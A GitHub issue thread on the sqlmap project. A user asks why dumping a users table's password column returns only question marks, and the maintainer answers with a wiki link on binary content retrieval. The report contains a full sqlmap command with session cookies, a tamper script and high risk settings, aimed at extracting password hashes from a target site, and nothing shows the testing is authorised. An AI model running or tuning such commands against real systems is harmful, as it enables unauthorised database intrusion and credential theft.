### ISSUE TITLE
I'm getting NULL or ???????? after retrieving a specific table 

### ISSUE THREAD

**Issue by rofkk** [sqlmapproject/sqlmap#4297]
**Describe the bug**
I'm trying to dump into a database but I'm getting only **NULL** or **??????** data.

**To Reproduce**
1. My command: 
 'sqlmap --url="https://mytarget.com/app/bordereau.php?import_id=1" --cookie="uid=MYUID;token=MYTOKEN;_ga=MYGA;_gid=MYGID;_gat_gtag_UA_XXXXXXX_1=1;PHPSESSID=MYPHPSESSID" --tamper=between --dbms=mysql -D target_db -T users -C password --dump --threads 10 --level 5 --risk 3 --hex
'
2. Result:

Database: target_db
Table: users
[1 entry]
+----------------------------------------------------------------------+
| password                                                          |
+----------------------------------------------------------------------+
| ???????????????????????????????????????????????????????????????????? |
+----------------------------------------------------------------------+

**Expected result**
Database: target_db
Table: users
[1 entry]
+----------------------------------------------------------------------+
| password                                                          |
+----------------------------------------------------------------------+
| a complexed hash to decrypt  |
+----------------------------------------------------------------------+
**Screenshots**
https://imgur.com/a/hQDJUrK

**Comment by stamparm** [comment]
https://github.com/sqlmapproject/sqlmap/wiki/Usage#binary-content-retrieval
